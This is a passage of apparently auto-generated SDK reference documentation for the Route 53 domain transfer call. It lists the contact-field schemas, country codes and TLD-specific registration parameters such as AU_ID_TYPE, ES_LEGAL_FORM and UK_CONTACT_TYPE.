'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
RegistrantContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
TechContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
PrivacyProtectAdminContact=True|False,
PrivacyProtectRegistrantContact=True|False,
PrivacyProtectTechContact=True|False
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to transfer to Route 53. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\n
:type IdnLangCode: string
:param IdnLangCode: Reserved for future use.
:type DurationInYears: integer
:param DurationInYears: [REQUIRED]\nThe number of years that you want to register the domain for. Domains are registered for a minimum of one year. The maximum period depends on the top-level domain.\nDefault: 1\n
:type Nameservers: list
:param Nameservers: Contains details for the host and glue IP addresses.\n\n(dict) --Nameserver includes the following elements.\n\nName (string) -- [REQUIRED]The fully qualified host name of the name server.\nConstraint: Maximum 255 characters\n\nGlueIps (list) --Glue IP address of a name server entry. Glue IP addresses are required only when the name of the name server is a subdomain of the domain. For example, if your domain is example.com and the name server for the domain is ns.example.com, you need to specify the IP address for ns.example.com.\nConstraints: The list can contain only one IPv4 and one IPv6 address.\n\n(string) --\n\n\n\n\n\n
:type AuthCode: string
:param AuthCode: The authorization code for the domain. You get this value from the current registrar.
:type AutoRenew: boolean
:param AutoRenew: Indicates whether the domain will be automatically renewed (true) or not (false). Autorenewal only takes effect after the account is charged.\nDefault: true\n
:type AdminContact: dict
:param AdminContact: [REQUIRED]\nProvides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type RegistrantContact: dict
:param RegistrantContact: [REQUIRED]\nProvides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type TechContact: dict
:param TechContact: [REQUIRED]\nProvides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a 